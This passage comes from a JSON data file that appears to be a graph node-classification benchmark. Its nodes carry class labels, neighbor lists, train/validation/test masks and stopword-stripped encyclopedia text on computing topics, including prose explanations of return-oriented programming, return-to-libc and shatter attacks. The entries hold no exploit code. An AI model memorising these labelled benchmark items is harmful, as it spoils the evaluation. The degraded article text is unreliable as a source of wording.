      3283,
      6869,
      3289,
      8923,
      4316,
      2782,
      4321,
      9442,
      740,
      4836,
      4326,
      2279,
      9448,
      3308,
      10989,
      238,
      10993,
      3834,
      1791,
      8959,
      11519,
      6927,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      7973,
      10024,
      3881,
      6441,
      10026,
      10029,
      3890,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      321,
      3394,
      9539,
      1348,
      5454,
      2383,
      3922,
      11605,
      2391,
      4439,
      5465,
      5470,
      7519,
      11103,
      2402,
      2919,
      4458,
      6506,
      9593,
      2943,
      8576,
      3463,
      9609,
      1418,
      5003,
      5004,
      6028,
      8080,
      4505,
      11677,
      929,
      4515,
      11683,
      3496,
      425,
      11693,
      430,
      6062,
      9654,
      9655,
      6584,
      1978,
      2493,
      7615,
      960,
      8640,
      7106,
      8132,
      6088,
      969,
      3535,
      4561,
      3538,
      8659,
      9173,
      1498,
      5594,
      478,
      479,
      5600,
      6114,
      6115,
      4074,
      2027,
      9196,
      6637,
      9709,
      5103,
      6641,
      3573,
      10747
    ],
    "mask": "None"
  },
  {
    "node_id": 1099,
    "label": 9,
    "text": "Eugene_McDonnell:eugene mcdonnell eugene edward mcdonnell october 18 1926 – august 17 2010 computer science pioneer long-time contributor programming language siblings apl j graduate brooklyn technical high school serving infantry corporal u.s. army world war ii attended university kentucky graduating 1949 summa cum laude elected phi beta kappa awarded first year graduate fellowship harvard university studied comparative literature particularly dante ’ divine comedy studying poems robert frost noticed first two poems frost book west-running brook spring pools freedom moon discuss reflecting rhyme schemes two reflect aabcbc cbcbaa met frost delighted find committed 193 lines john milton lycidas memory first work ibm design ibm ’ first time-sharing system became early host ivsys iverson system predecessor apl 1968 became colleague ken iverson used iverson notation apl named active earliest days apl holds 3 september 1968 information transfer control system allowing communication two users 1978 left ibm joined i. p. sharp associates retiring therefrom 1990 ibm mcdonnell devised notation signum circle functions apl designed complex floor function proposed extension gcd lcm iverson responsible including hooks forks j result zero divided zero j proposed 1976 1987 iverson award mcdonnell publisher apl press producing source book apl apl quote quad early years editor principal contributor recreational apl column apl quote-quad many years wrote dozens play j columns vector journal british apl association contributed sloane on-line encyclopedia integer sequences member jane austen society north america jasna gave talk classical persuasion jasna meeting lake louise 1993 active bay area jane austen group wrote topical index dierdre le faye edition austen letters seen republic pemberley website mcdonnell died peacefully home palo alto august 17 2010",
    "neighbors": [
      9993,
      1178,
      8987,
      667,
      10668,
      4921,
      9019,
      11075,
      8262,
      7630,
      3323,
      2519,
      1883,
      11099,
      9825,
      11625,
      4331,
      2670,
      8695,
      505,
      2939
    ],
    "mask": "Test"
  },
  {
    "node_id": 1100,
    "label": 2,
    "text": "GPUTILS:gputils gputils frequently written gputils gpl-licensed set tools pic microcontroller comprising assembler disassembler linker object file viewer available various flavors unix mac os x microsoft windows gpasm gnu pic assembler originally developed james bowman released version 0.0.3 july 13 1998 craig franklin extended gpasm entire suite assembler- linker-related tools renamed project gputils releasing gputils 0.0.4 march 4 2001 project currently maintained david barnett gputils created craig franklin james bowman currently primarily supported molnár károly recently supported borut ražem past supported david barnett scott dattalo marko kohtala",
    "neighbors": [
      477,
      6664,
      5612,
      6797,
      7983,
      5492,
      7445,
      3386,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1101,
    "label": 4,
    "text": "Open-source_software_security:open-source software security open-source software security measure assurance guarantee freedom danger risk inherent open-source software system variety models metrics measure security system methods used measure security software systems argued system vulnerable potential vulnerability discovered patch created measuring number days vulnerability vulnerability fixed basis determined security system caveats approach every vulnerability equally bad fixing lot bugs quickly might better finding taking little bit longer fix taking account operating system effectiveness fix poisson process used measure rates different people find security flaws open closed source software process broken number volunteers n paid reviewers n. rates volunteers find flaw measured λ rate paid reviewers find flaw measured λ expected time volunteer group expected find flaw 1/ n λ expected time paid group expected find flaw 1/ n λ comparing large variety open source closed source projects star system could used analyze security project similar morningstar inc. rates mutual funds large enough data set statistics could used measure overall effectiveness one group example system follows coverity collaboration stanford university established new baseline open-source quality security development completed contract department homeland security utilizing innovations automated defect detection identify critical types bugs found software level quality security measured rungs rungs definitive meaning change coverity releases new tools rungs based progress fixing issues found coverity analysis results degree collaboration coverity start rung 0 currently go rung 2 project analyzed coverity ’ scan infrastructure representatives open-source software come forward results rung 1 collaboration coverity development team software analyzed subset scanning features prevent development team overwhelmed 11 projects analyzed upgraded status rung 2 reaching zero defects first year scan projects include amanda ntp openpam openvpn overdose perl php postfix python samba tcl number podcasts cover open-source software security",
    "neighbors": [
      3969,
      7810,
      132,
      6276,
      8582,
      10631,
      7561,
      394,
      10255,
      916,
      11418,
      4636,
      3229,
      9245,
      5663,
      546,
      1315,
      292,
      4777,
      3114,
      4011,
      7980,
      5677,
      2864,
      692,
      2228,
      823,
      7223,
      2236,
      6718,
      9151,
      10687,
      6338,
      8644,
      3654,
      5703,
      7626,
      10442,
      10344,
      8909,
      10317,
      8147,
      3030,
      5335,
      10971,
      6622,
      3296,
      4192,
      9953,
      10851,
      9320,
      4841,
      6890,
      107,
      7913,
      237,
      1646,
      8554,
      10088,
      8177,
      5747,
      6773,
      2550,
      5369,
      6910
    ],
    "mask": "Test"
  },
  {
    "node_id": 1102,
    "label": 7,
    "text": "Enomaly_Inc:enomaly inc enomaly inc. founded 2004 developer system software virtualization management cloud computing headquartered toronto ontario canada initially founded open source consulting company reuven cohen george bazos lars forsberg company quickly grew open source consultancy system integrator one first focused emerging cloud computing space richard reiner joined enomaly chairman ceo march 2009 company among first provide self-service infrastructure-as-a-service iaas platform first version launched 2005 open source platform called enomalism later renamed ecp made available commercially closed sourced enomaly current software called elastic computing platform service provider edition ecp/spe released july 2009 allows web hosts service providers offer public facing iaas cloud services customers means similar amazon ec2 enomaly offers cloud infrastructure capabilities established carriers service hosting providers turn use existing physical data center offer combination cloud services dedicated hosting services customers november 2010 enomaly launched spotcloud.com described first commodity style clearinghouse marketplace unused cloud computing capacity according spotcloud site service built google app engine enomaly ecp platform well cloud infrastructure platforms near future spotcloud easy use structured cloud capacity marketplace service providers sell excess computing capacity wide array buyers resellers enomaly core product ecp used numerous service providers foundation cloud computing offerings includes",
    "neighbors": [
      6153,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      6307,
      9766,
      5159,
      6444,
      8495,
      3121,
      7352,
      2496,
      4289,
      1224,
      8520,
      4429,
      7248,
      1362,
      467,
      9682,
      6367,
      4194,
      11646,
      5732,
      10090,
      3819,
      7660,
      8439,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1103,
    "label": 4,
    "text": "Return-oriented_programming:return-oriented programming return-oriented programming rop computer security exploit technique allows attacker execute code presence security defenses executable space protection code signing technique attacker gains control call stack hijack program control flow executes carefully chosen machine instruction sequences already present machine memory called gadgets gadget typically ends return instruction located subroutine within existing program and/or shared library code chained together gadgets allow attacker perform arbitrary operations machine employing defenses thwart simpler attacks return-oriented programming advanced version stack smashing attack generally types attacks arise adversary manipulates call stack taking advantage bug program often buffer overrun buffer overrun function perform proper bounds checking storing user-provided data memory accept input data store properly data written onto stack excess data may overflow space allocated function variables e.g. locals stack diagram right overwrite return address address later used function redirect control flow back caller overwritten control flow diverted location specified new return address standard buffer overrun attack attacker would simply write attack code payload onto stack overwrite return address location newly written instructions late 1990s major operating systems offer protection attacks microsoft windows provided buffer-overrun protections 2004 eventually operating systems began combat exploitation buffer overflow bugs marking memory data written non-executable technique known executable space protection enabled machine would refuse execute code located user-writable areas memory preventing attacker placing payload stack jumping via return address overwrite hardware support later became available strengthen protection data execution prevention adversary execute maliciously injected instructions typical buffer overflow overwrites contents data section memory marked non-executable defeat return-oriented programming attack inject malicious code rather uses instructions already present called gadgets manipulating return addresses typical data execution prevention defend attack adversary use malicious code rather combined good instructions changing return addresses therefore code used would marked non-executable widespread implementation data execution prevention made traditional buffer overflow vulnerabilities difficult impossible exploit manner described instead attacker restricted code already memory marked executable program code linked shared libraries since shared libraries libc often contain subroutines performing system calls functionality potentially useful attacker likely candidates finding code assemble attack return-into-library attack attacker hijacks program control flow exploiting buffer overrun vulnerability exactly discussed instead attempting write attack payload onto stack attacker instead chooses available library function overwrites return address entry location stack locations overwritten obeying applicable calling conventions carefully pass proper parameters function performs functionality useful attacker technique first presented solar designer 1997 later extended unlimited chaining function calls rise 64-bit x86 processors brought change subroutine calling convention required first argument function passed register instead stack meant attacker could longer set library function call desired arguments manipulating call stack via buffer overrun exploit shared library developers also began remove restrict library functions performed functions particularly useful attacker system call wrappers result return-into-library attacks became much difficult mount successfully next evolution came form attack used chunks library functions instead entire functions exploit buffer overrun vulnerabilities machines defenses simpler attacks technique looks functions contain instruction sequences pop values stack registers careful selection code sequences allows attacker put suitable values proper registers perform function call new calling convention rest attack proceeds return-into-library attack return-oriented programming builds borrowed code chunks approach extends provide turing complete functionality attacker including loops conditional branches put another way return-oriented programming provides fully functional language attacker use make compromised machine perform operation desired hovav shacham published technique 2007 demonstrated important programming constructs simulated using return-oriented programming target application linked c standard library containing exploitable buffer overrun vulnerability return-oriented programming attack superior attack types discussed expressive power resistance defensive measures none counter-exploitation techniques mentioned including removing potentially dangerous functions shared libraries altogether effective return-oriented programming attack although return-oriented programming attacks performed variety architectures shacham paper majority follow-up work focus intel x86 architecture x86 architecture variable-length cisc instruction set return-oriented programming x86 takes advantage fact instruction set dense random sequence bytes likely interpretable valid set x86 instructions therefore possible search opcode alters control flow notably return instruction 0xc3 look backwards binary preceding bytes form possibly useful instructions sets instruction gadgets chained overwriting return address via buffer overrun exploit address first instruction first gadget first address subsequent gadgets written successively onto stack conclusion first gadget return instruction executed pop address next gadget stack jump conclusion gadget chain continues third chaining small instruction sequences attacker able produce arbitrary program behavior pre-existing library code shacham asserts given sufficiently large quantity code including limited c standard library sufficient gadgets exist turing-complete functionality automated tool developed help automate process locating gadgets constructing attack binary tool known ropgadget searches binary looking potentially useful gadgets attempts assemble attack payload spawns shell accept arbitrary commands attacker address space layout randomization also vulnerabilities according paper shacham et al aslr 32-bit architectures limited number bits available address randomization 16 32 address bits available randomization 16 bits address randomization defeated brute force attack minutes 64-bit architectures 40 bits 64 available randomization 2016 brute force attack 40-bit randomization possible unlikely go unnoticed also randomization defeated de-randomization techniques even perfect randomization leakage memory contents help calculate base address dll runtime according paper checkoway et al possible perform return-oriented-programming x86 arm architectures without using return instruction 0xc3 x86 instead used carefully crafted instruction sequences already exist machine memory behave like return instruction return instruction two effects firstly searches four-byte value top stack sets instruction pointer value secondly increases stack pointer value four x86 architecture sequences jmp pop instructions act return instruction arm sequences load branch instructions act return instruction since new approach use return instruction negative implications defense defense program checks several returns also several jump instructions attack may detected g-free technique developed kaan onarlioglu leyla bilge andrea lanzi davide balzarotti engin kirda practical solution possible form return-oriented programming solution eliminates unaligned free-branch instructions instructions like ret call attackers use change control flow inside binary executable protects free-branch instructions used attacker way g-free protects return address similar xor canary implemented stackguard checks authenticity function calls appending validation block expected result found g-free causes application crash number techniques proposed subvert attacks based return-oriented programming rely randomizing location program library code attacker accurately predict location instructions might useful gadgets therefore mount successful return-oriented programming attack chain one fairly common implementation technique address space layout randomization aslr loads shared libraries different memory location program load although widely deployed modern operating systems aslr vulnerable information leakage attacks approaches determine address known library function memory attacker successfully determine location one known instruction position others inferred return-oriented programming attack constructed randomization approach taken relocating instructions and/or program state registers stack objects program separately instead library locations requires extensive runtime support software dynamic translator piece randomized instructions back together runtime technique successful making gadgets difficult find utilize comes significant overhead another approach taken kbouncer modifies operating system verify return instructions actually divert control flow back location immediately following call instruction prevents gadget chaining carries heavy performance penalty effective jump-oriented programming attacks alter jumps control-flow-modifying instructions instead returns w^x also called data execution prevention/dep no-execute/nx security feature pages processes memory may either writable executable w^x alone provide perfect protection memory-based vulnerabilities aslr technologies provide advanced protection memory based vulnerabilities w^x first implemented openbsd 2003 structured exception handler overwrite protection feature windows protects common stack overflow attacks especially attacks structured exception handler small embedded systems proliferating due expansion internet things need protection embedded systems also increasing using instruction based memory access control ib-mac implemented hardware possible protect low-cost embedded systems malicious control flow stack overflow attacks protection provided separating data stack return stack however due lack memory management unit embedded systems hardware solution applied embedded systems 2010 jinku li et al proposed suitably modified compiler could completely eliminate return-oriented gadgets replacing codice_1 instruction sequence codice_2 codice_3 instruction sequence codice_4 codice_5 represents immutable tabulation legitimate return addresses program codice_6 represents specific index table prevents creation return-oriented gadget returns straight end function arbitrary address middle another function instead gadgets return legitimate return addresses drastically increases difficulty creating useful gadgets li et al claimed return indirection technique essentially de-generalizes return-oriented programming back old style return-into-libc proof-of-concept compiler included peephole optimization phase deal certain machine instructions happen contain return opcode opcodes immediate operands codice_7 armv8.3-a architecture introduces new feature hardware level takes advantage unused bits pointer address space cryptographically sign pointer addresses jumping pointer signature checked error occurs check fails notably latest iphone a12 chips upgraded armv8.3 make use pacs",
    "neighbors": [
      642,
      6797,
      1554,
      3603,
      6550,
      1820,
      7983,
      5040,
      9911,
      5176,
      2367,
      11584,
      1094,
      3270,
      2638,
      1745,
      4562,
      8787,
      3286,
      9435,
      5354,
      499,
      372,
      6653,
      9854
    ],
    "mask": "Train"
  },
  {
    "node_id": 1104,
    "label": 7,
    "text": "Zettabox:zettabox zettabox pan-european online cloud storage team-sharing tool created co-founders james kinsella robert mcneal company ’ operational headquarters located prague whilst sales marketing decisions headed london time zettabox founded total amount worldwide data saved networks surpassed 1,000 exabytes entered new era sizing storage – zettabytes 1 x 1021 cloud team sharing storage market heavily dominated american-domiciled companies dropbox box.com zettabox launched european alternative launch coincided news impending general data protection regulation part digital single market strategy requires companies business europe know data stored able communicate information customers recently 2018 2019 series privacy violations facebook social media companies renewed calls greater scrutiny largest companies use misuse users data zettabox described ‘ example genuinely european cloud storage solution ’ “ eu data protection reform big data factsheet ” european commission cited zettabox first major pan-european alternative us-based cloud storage products like google drive dropbox",
    "neighbors": [
      1801,
      9901,
      4623
    ],
    "mask": "Test"
  },
  {
    "node_id": 1105,
    "label": 4,
    "text": "Contact_analysis_(cryptanalysis):contact analysis cryptanalysis cryptanalysis contact analysis study frequency certain symbols precede follow symbols method used aid breaking classical ciphers contact analysis based fact sample written language certain symbols appear adjacent symbols varying frequencies moreover frequencies roughly almost samples language even distribution symbols differs significantly normal true regardless whether symbols used words letters ciphers properties natural language plaintext preserved ciphertext potential exploited ciphertext-only attack although sense contact analysis considered type frequency analysis discussions frequency analysis concern simple probabilities symbols text formula_1 formula_2 contact analysis based conditional probability certain letters precede succeed letters formula_3 formula_4 even formula_5 formula_6 formula_7 subsets alphabet used frequency analysis based first-order statistics contact analysis based second third-order statistics",
    "neighbors": [
      8674,
      11241,
      9615,
      5487,
      9617,
      1941
    ],
    "mask": "None"
  },
  {
    "node_id": 1106,
    "label": 2,
    "text": "Prelink:prelink computing prebinding also called prelinking method optimizing application load times resolving library symbols prior launch computer programs consist code requires external shared libraries execute libraries normally integrated program run time loader process called dynamic linking dynamic linking advantages code size management drawbacks well every time program run loader needs resolve find relevant libraries since libraries move around memory performance penalty resolution penalty increases additional library needing resolution prelinking reduces penalty resolving libraries advance afterward resolution occurs libraries changed since prelinked following perhaps upgrade mac os stores executables mach-o file format mac os x performs prebinding optimizing stage installing system software certain applications prebinding changed times within mac os x series 10.2 prebinding happened installation procedure aforementioned optimizing stage 10.2 10.3 os checked prebinding launch time applications first time application ran would prebound making subsequent launches faster could also manually run os-level installs 10.4 os libraries prebound 10.5 later apple replaced prebinding dyld shared cache mechanism provided better os performance linux prelinking accomplished via prelink program free program written jakub jelínek red hat elf binaries performance results mixed seems aid systems large number libraries kde prelink run -r option randomly select address base libraries loaded makes difficult perform return-to-libc attack system addresses used unique system reason prelink kernel facilities supplying address space layout randomization aslr libraries used conjunction prelink without defeating purpose prelink forcing dynamic linker perform relocations program load time stated prelink per-process library address randomization used conjunction order avoid completely removing security enhancement prelink supplies randomization however help general information leak caused prelink attackers ability read certain arbitrary files target system discover libraries loaded privileged daemons often libc enough common library used return-to-libc attacks reading shared library file libc attacker local access discover load address libc every application system since programs link libc libc library file always readable attacker local access may gather information address space higher privileged processes local access may commonly gained shell accounts web server accounts allow use cgi scripts may read output file system directory traversal vulnerabilities used attackers without accounts cgi script vulnerabilities available prelink often run periodically typically every two weeks address given library chance changing time prelink often used incremental mode already prelinked libraries altered unless absolutely necessary library may change base address prelink re-run gives address derived half-life period prelink run also note new version library installed addresses changes jakub jelínek points position independent executables pie ignore prelinking red hat enterprise linux fedora recommends network suid programs built pie facilitate secure environment occasionally prelinking cause issues application checkpoint restart libraries like codice_1 well libraries like openmpi use codice_1 internally specifically checkpointing program one host trying restart different host restarted program may fail segfault due differences host-specific library memory address randomization",
    "neighbors": [
      10176,
      1922,
      2339,
      8966,
      6664,
      5065,
      9854,
      3386,
      9455,
      2804,
      823,
      5176,
      2138,
      4926,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 1107,
    "label": 2,
    "text": "Mythbuntu:mythbuntu mythbuntu discontinued media center operating system based ubuntu integrated mythtv media center software main function install programs included ubuntu following principles fellow linux distributions linhes mythdora mythbuntu designed simplify installation mythtv home theater pc mythbuntu installed mythtv setup program begins configured frontend media viewer backend media server combination two mythbuntu aimed keep close ties ubuntu thus allowing changes moved upstream greater benefit ubuntu community due close link ubuntu easy conversions desktop standalone mythbuntu installations possible development cycle mythbuntu originally followed ubuntu releases occurring every six months starting 12.04 mythbuntu releases tracked ubuntu lts long-term support releases release approximately every two years 4 november 2016 development team announced end mythbuntu separate distribution citing insufficient developers team continue maintain mythbuntu software repository announcement advised new users install another ubuntu distribution install mythtv repository mythbuntu uses xfce desktop interface default users install ubuntu-desktop kubuntu-desktop xubuntu-desktop mythbuntu control centre allowing users get default interfaces flavors ubuntu software included release media-related software vlc amunix rhythmbox mythbuntu control centre provides gui used configure system user select kind system backend frontend wish installed inside control centre user perform common actions installing plugins mythtv configuring mysql database setting passwords installing drivers codecs mythtv updates enabled well switching latest release version development branch mythtv configuration remote controls range utilities small programs performed within program mythbuntu used install full mythtv system single device acting client server front-end software required visual elements gui utilised common user find play manipulate media files back end server media files tuners database actually stored combined front-and-back-end system may advantage portability standalone device dependent separate server gaming console alternatively mythbuntu used install mythtv client front-end-only system might useful users already central storage server home central storage device act mythtv server mythtv front-end client software installed devices low-power hardware mythbuntu also run directly cd-rom without installation provided network connection pc mythtv back-end server using server separate one front-end units offers ability use multiple clients simultaneous access single repository shared media files server used would generally hardware relatively high specification kept outside main living room entertainment area home another advantage ability move potentially noisy hardware living room low-noise high-performance hardware expensive mythbuntu ubuntu derivative offers easy single-click conversion ubuntu mythbuntu means user longer needs type command line daunting new users hunt packages various package managers",
    "neighbors": [
      9253,
      11305,
      4147,
      56,
      59,
      4673,
      3654,
      3664,
      1110,
      4192,
      3685,
      9324,
      10860,
      2671,
      3189,
      5755,
      4219,
      11388,
      8837,
      1674,
      6797,
      10394,
      673,
      3745,
      1700,
      3245,
      7854,
      2738,
      4790,
      8907,
      5343,
      6371,
      4841,
      6890,
      7913,
      6380,
      7920,
      5363,
      9971,
      9461,
      6393,
      5369,
      8957,
      7435,
      2321,
      5397,
      4887,
      8476,
      5410,
      10530,
      6445,
      7983,
      823,
      7483,
      3903,
      2375,
      5962,
      4951,
      2914,
      5990,
      9064,
      7020,
      7022,
      7534,
      2930,
      9074,
      1396,
      3969,
      4490,
      10127,
      11669,
      3478,
      926,
      10149,
      6058,
      8112,
      7602,
      439,
      8124,
      10687,
      4039,
      5067,
      975,
      9693,
      3550,
      6625,
      7140,
      485,
      5612,
      8177,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 1108,
    "label": 4,
    "text": "Cloudbric:cloudbric cloudbric cloud-based web security provider based seoul south korea offers waf ddos protection ssl solution protects websites sql injection cross-site scripting identity theft website defacement application layer ddos attacks early 2015 cloudbric launched in-house venture penta security systems inc. idea creating cloud web security service/web application firewall accessible first started in-house project grew global service december 1 2017 cloudbric corporation became company time spin-off cloudbric acquired 27 idcs internet data centers 50 partnerships 8,000 user sign-ups november 2017 cloudbric launched cloudbric labs collection free web security resources services available use integration users across web currently consists blackipedia ip reputation service threat index database web vulnerabilities wafer waf evaluator tests performance accuracy may 2018 cloudbric unveiled plans launch reverse ico initiative working product cloudbric plans build web security offerings introduction decentralized user-led security platform cloudbric ’ pricing model based monthly website traffic rather premium service features meaning users access cloudbric ’ comprehensive suite web security services default cloudbric ’ waf operates proxy detect filter malicious attacks requiring customers change website domain name system dns",
    "neighbors": [
      899,
      4198,
      2887,
      7688,
      331,
      7352
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1109,
    "label": 6,
    "text": "Sticky_bit:sticky bit computing sticky bit user ownership access right flag assigned files directories unix-like systems directory sticky bit set filesystem treats files directories special way file owner directory owner root user rename delete file without sticky bit set user write execute permissions directory rename delete contained files regardless file owner typically set codice_1 directory prevent ordinary users deleting moving users files modern function sticky bit introduced 4.3bsd 1986 found modern unix-like systems sticky bit introduced fifth edition unix 1974 use pure executable files set instructed operating system retain text segment program swap space process exited speeds subsequent executions allowing kernel make single operation moving program swap real memory thus frequently-used programs like editors would load noticeably faster one notable problem stickied programs replacing executable instance patching required removing sticky bit executable executing program exiting flush cache replacing binary executable restoring sticky bit currently behavior operative hp-ux unixware solaris appears abandoned 2005 4.4-lite release bsd retained old sticky bit behavior subsequently dropped openbsd release 3.7 freebsd release 2.2.1 version linux ever supported traditional behavior common use sticky bit directories residing within filesystems unix-like operating systems directory sticky bit set filesystem treats files directories special way file owner directory owner root rename delete file without sticky bit set user write execute permissions directory rename delete contained files regardless file owner typically set codice_1 directory prevent ordinary users deleting moving users files feature introduced 4.3bsd 1986 today found modern unix-like systems addition solaris solaris 2.5 defines special behavior sticky bit set non-executable files files accessed cached kernel usually set swap files prevent access file flushing important data system cache also used occasionally benchmarking tests sticky bit also set automounter indicate file mounted yet allows programs like ls ignore unmounted remote files sticky bit set using chmod command set using octal mode 1000 symbol already used setuid bit example add bit directory codice_3 one would type chmod +t /usr/local/tmp make sure directory standard codice_4 permissions one could also type chmod 1777 /usr/local/tmp clear use chmod -t /usr/local/tmp chmod 0777 /usr/local/tmp latter also reset codice_4 directory standard permissions unix symbolic file system permission notation sticky bit represented letter final character-place replacing would otherwise x instance solaris 8 codice_1 directory default sticky-bit set shows sticky-bit set file directory without execution bit set others category non-user-owner non-group-owner indicated capital replacing would otherwise",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      5179,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      1193,
      7344,
      2230,
      5816,
      8379,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      6369,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      11539,
      5397,
      6935,
      1304,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      823,
      1336,
      3909,
      4423,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      2432,
      7554,
      8075,
      11675,
      414,
      2974,
      3487,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      9151,
      3522,
      8643,
      7126,
      6624,
      1509,
      9189,
      6120,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1110,
    "label": 2,
    "text": "KaOS:kaos kaos linux distribution built scratch specific focus qt kde although kaos currently based linux kernel developers constantly evaluating illumos kernel say future switch wish first version kaos released kdeos 2013 prevent confusion distribution name desktop environment kde name changed kaos september 2013 kaos distributed via iso image exclusively supports 64-bit processors idea behind kaos create tightly integrated rolling transparent distribution modern desktop build scratch specific focus focus one de kde plasma one toolkit qt one architecture x86_64 plus focus evaluating selecting suitable tools applications phoronix wrote 2016 overall quite pleased niche distribution kaos easy install quickly running bleeding-edge kde plasma 5 stack overall fun pleasant hours spent kaos fossmint stated 2017 kaos modern open-source beautifully designed qt kde-focused linux distro rolling release ships kde plasma default desktop environment uses pacman package manager 3-group structure repository github fact rolling release means never need worry future updates moment version installed like case ubuntu like would need consider whether perform clean installation another “ major version ” hectic geek reviewed kaos 2014 wrote distribution fast included necessary applications jesse smith distrowatch weekly wrote review kaos 2014.04 smith said features kaos worked well robert rijkhoff reviewed kaos 2017.09 distrowatch weekly said kaos seems trying little bit hard different zdnet wrote hands-on review kaos 2014.06 dedoimedo reviewed kaos 2014.12 jack wallen linux.com stated opinion kaos 2016 said distribution beautiful",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 1111,
    "label": 4,
    "text": "Blue_team_(computer_security):blue team computer security blue team group individuals perform analysis information systems ensure security identify security flaws verify effectiveness security measure make certain security measures continue effective implementation part united states computer security defense initiative red teams developed exploit malicious entities would harm result blue teams developed design defensive measures red team activities incident occur within organization blue team perform following six steps handle situation preparation computer security incident blue team perform hardening techniques operating systems throughout organization blue team must always mindful network perimeter including traffic flow packet filtering proxy firewalls intrusion detection systems blue teams employ wide range tools allowing detect attack collect forensic data perform data analysis make changes threat future attacks mitigate threats tools include siem software supports threat detection security incident response performing real-time data collection analysis security events type software also uses data sources outside network including indicators compromise ioc threat intelligence",
    "neighbors": [
      11429,
      4198,
      9688,
      3614,
      10858,
      11188,
      11198,
      184,
      11611,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1112,
    "label": 9,
    "text": "GNU_Smalltalk:gnu smalltalk gnu smalltalk implementation smalltalk programming language gnu project implementation unlike smalltalk environments uses text files program input interprets contents smalltalk code way gnu smalltalk acts like interpreter rather environment traditional smalltalk manner gnu smalltalk includes bindings many free software libraries including sqlite libsdl cairo gettext expat examples work gnu smalltalk 3.0 later versions classic hello world example basic smalltalk code constructing using array constructing using hash parameter-passing block closure returning closures method using block send info back caller invoke method passing block iterating enumerations arrays using blocks method inject accept parameter block iterates member list performing function retaining aggregate analogous foldl function functional programming languages example first pass block receives 10 argument inject sum 1 first element array element returns 11 11 becomes sum next pass added 3 get 14 14 added 5 finally return 19 blocks work many built-in methods using enumeration block square numbers 1 10 following code defines class named person deriving magnitude automatically defines comparison methods except one codice_1 addition one codice_2 sort age note override way object printed/displayed default share programmer-print user-display representation overriding codice_3 prints three names reverse age order exception raised codice_4 call optional message added exception also codice_5 raises different kind exception actually wrappers actual exception raising method codice_6 exceptions handled codice_7 blocks course catch particular exceptions subclasses possible use exception object made available handler clause exit resume first block exiting default also mentioned explicitly",
    "neighbors": [
      2050,
      2180,
      11654,
      2955,
      4493,
      6413,
      1939,
      3859,
      7325,
      1822,
      5409,
      802,
      3618,
      6694,
      5546,
      8621,
      7983,
      5555,
      823,
      9148,
      10687,
      708,
      8262,
      5703,
      10822,
      5833,
      8147,
      3674,
      2010,
      862,
      10464,
      11625,
      4459,
      9323,
      9579,
      8304,
      1394,
      5492,
      8436,
      3323,
      2557,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 1113,
    "label": 4,
    "text": "Shatter_attack:shatter attack computing shatter attack programming technique employed hackers microsoft windows operating systems bypass security restrictions processes session shatter attack takes advantage design flaw windows message-passing system whereby arbitrary code could injected running application service session makes use message loop could result privilege escalation exploit shatter attacks became topic intense conversation security community august 2002 publication chris paget paper titled exploiting design flaws win32 api privilege escalation paper coined term shatter attack explained process application could execute arbitrary code another application could occur windows allows unprivileged applications send messages message loops higher-privileged application messages address callback function application address space parameter attacker manages put string memory higher-privileged application say pasting shellcode edit box known location could send wm_timer messages callback function parameters set point attacker string weeks publication paper microsoft responded noting paper correct situation exists correctly describe effect ... paper errs claiming flaw windows reality flaw lies specific highly privileged service design services within interactive desktop peers levy requests upon result services interactive desktop effectively privileges commensurate highly privileged service december 2002 microsoft issued patch windows nt 4.0 windows 2000 windows xp closed avenues exploitation partial solution however fix limited services included windows could exploited using technique underlying design flaw still existed could still used target applications third-party services windows vista microsoft aimed solve problem two ways first local users longer log session 0 thus separating message loop logged-in user session high-privilege system services loaded session 0 second new feature called user interface privilege isolation uipi introduced whereby processes protected shatter attacks assigning integrity level process attempts send messages process higher integrity level fail even processes owned user however interactions processes different integrity levels prevented uipi internet explorer 7 example uses uipi feature limit extent rendering components interact rest system way sessions instantiated redesigned windows vista windows server 2008 provide additional protection shatter attacks local user 